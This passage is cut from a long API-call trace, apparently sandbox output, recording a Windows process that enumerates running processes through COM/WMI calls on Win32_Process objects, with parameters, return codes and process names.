WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514c08) returned 0x0 [0264.443] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0264.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514c08) returned 0x0 [0264.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.443] WbemDefPath:IUnknown:AddRef (This=0x5514c08) returned 0x3 [0264.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5513c70) returned 0x0 [0264.443] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5513c70, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.443] WbemDefPath:IUnknown:Release (This=0x5513c70) returned 0x3 [0264.443] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.443] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.443] WbemDefPath:IUnknown:Release (This=0x5514c08) returned 0x2 [0264.443] WbemDefPath:IUnknown:Release (This=0x5514c08) returned 0x1 [0264.443] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.443] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.444] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c08, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514c08) returned 0x0 [0264.444] WbemDefPath:IUnknown:AddRef (This=0x5514c08) returned 0x3 [0264.444] WbemDefPath:IUnknown:Release (This=0x5514c08) returned 0x2 [0264.444] WbemDefPath:IWbemPath:SetText (This=0x5514c08, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3592\"") returned 0x0 [0264.444] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.444] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.444] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.444] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.446] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.446] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.446] IWbemClassObject:Get (in: This=0x6717f0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ca108*=0, plFlavor=0x23ca10c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="areaspaceanother.exe", varVal2=0x0), pType=0x23ca108*=8, plFlavor=0x23ca10c*=0) returned 0x0 [0264.446] SysStringByteLen (bstr="areaspaceanother.exe") returned 0x28 [0264.446] SysStringByteLen (bstr="areaspaceanother.exe") returned 0x28 [0264.447] IWbemClassObject:Get (in: This=0x6717f0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ca108*=8, plFlavor=0x23ca10c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="areaspaceanother.exe", varVal2=0x0), pType=0x23ca108*=8, plFlavor=0x23ca10c*=0) returned 0x0 [0264.447] SysStringByteLen (bstr="areaspaceanother.exe") returned 0x28 [0264.447] SysStringByteLen (bstr="areaspaceanother.exe") returned 0x28 [0264.447] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.447] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x671988, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.503] IUnknown:QueryInterface (in: This=0x671988, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x671988) returned 0x0 [0264.503] IUnknown:QueryInterface (in: This=0x671988, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.503] IUnknown:QueryInterface (in: This=0x671988, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.503] IUnknown:QueryInterface (in: This=0x671988, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.503] IUnknown:AddRef (This=0x671988) returned 0x3 [0264.504] IUnknown:QueryInterface (in: This=0x671988, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.504] IUnknown:QueryInterface (in: This=0x671988, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.504] IUnknown:QueryInterface (in: This=0x671988, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x67198c) returned 0x0 [0264.504] IMarshal:GetUnmarshalClass (in: This=0x67198c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.504] IUnknown:Release (This=0x67198c) returned 0x3 [0264.504] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.504] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.504] IUnknown:QueryInterface (in: This=0x671988, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.504] IUnknown:Release (This=0x671988) returned 0x2 [0264.504] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.504] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.504] IUnknown:QueryInterface (in: This=0x671988, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x671988) returned 0x0 [0264.504] IUnknown:AddRef (This=0x671988) returned 0x4 [0264.504] IUnknown:Release (This=0x671988) returned 0x3 [0264.504] IUnknown:Release (This=0x671988) returned 0x2 [0264.504] CoTaskMemFree (pv=0x54ba2c8) [0264.504] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.504] IUnknown:AddRef (This=0x671988) returned 0x3 [0264.505] IWbemClassObject:Get (in: This=0x671988, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.505] IWbemClassObject:Get (in: This=0x671988, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3088\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.505] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3088\"") returned 0x5e [0264.505] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3088\"") returned 0x5e [0264.505] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.505] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.505] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.506] IUnknown:Release (This=0x601a94) returned 0x1 [0264.509] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba238) returned 0x0 [0264.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba238, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.510] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba238, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514b28) returned 0x0 [0264.510] WbemDefPath:IUnknown:Release (This=0x54ba238) returned 0x0 [0264.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514b28) returned 0x0 [0264.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.510] WbemDefPath:IUnknown:AddRef (This=0x5514b28) returned 0x3 [0264.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5513af0) returned 0x0 [0264.510] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5513af0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.510] WbemDefPath:IUnknown:Release (This=0x5513af0) returned 0x3 [0264.510] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.511] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.511] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.511] WbemDefPath:IUnknown:Release (This=0x5514b28) returned 0x2 [0264.511] WbemDefPath:IUnknown:Release (This=0x5514b28) returned 0x1 [0264.511] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.511] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.511] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514b28, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514b28) returned 0x0 [0264.511] WbemDefPath:IUnknown:AddRef (This=0x5514b28) returned 0x3 [0264.511] WbemDefPath:IUnknown:Release (This=0x5514b28) returned 0x2 [0264.511] WbemDefPath:IWbemPath:SetText (This=0x5514b28, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3088\"") returned 0x0 [0264.511] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.511] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.511] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.512] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.512] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.512] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.512] IWbemClassObject:Get (in: This=0x671988, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ca9bc*=0, plFlavor=0x23ca9c0*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="weight-employee.exe", varVal2=0x0), pType=0x23ca9bc*=8, plFlavor=0x23ca9c0*=0) returned 0x0 [0264.512] SysStringByteLen (bstr="weight-employee.exe") returned 0x26 [0264.512] SysStringByteLen (bstr="weight-employee.exe") returned 0x26 [0264.512] IWbemClassObject:Get (in: This=0x671988, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ca9bc*=8, plFlavor=0x23ca9c0*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="weight-employee.exe", varVal2=0x0), pType=0x23ca9bc*=8, plFlavor=0x23ca9c0*=0) returned 0x0 [0264.512] SysStringByteLen (bstr="weight-employee.exe") returned 0x26 [0264.512] SysStringByteLen (bstr="weight-employee.exe") returned 0x26 [0264.512] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.512] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x671fe8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.514] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x671fe8) returned 0x0 [0264.514] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.514] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.514] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.514] IUnknown:AddRef (This=0x671fe8) returned 0x3 [0264.514] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.514] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.515] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x671fec) returned 0x0 [0264.515] IMarshal:GetUnmarshalClass (in: This=0x671fec, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.515] IUnknown:Release (This=0x671fec) returned 0x3 [0264.515] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.515] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.515] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.515] IUnknown:Release (This=0x671fe8) returned 0x2 [0264.515] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.515] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.515] IUnknown:QueryInterface (in: This=0x671fe8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x671fe8) returned 0x0 [0264.515] IUnknown:AddRef (This=0x671fe8) returned 0x4 [0264.515] IUnknown:Release (This=0x671fe8) returned 0x3 [0264.515] IUnknown:Release (This=0x671fe8) returned 0x2 [0264.515] CoTaskMemFree (pv=0x54ba238) [0264.515] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.515] IUnknown:AddRef (This=0x671fe8) returned 0x3 [0264.515] IWbemClassObject:Get (in: This=0x671fe8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.516] IWbemClassObject:Get (in: This=0x671fe8, wszName="__PATH", lFlags=0, 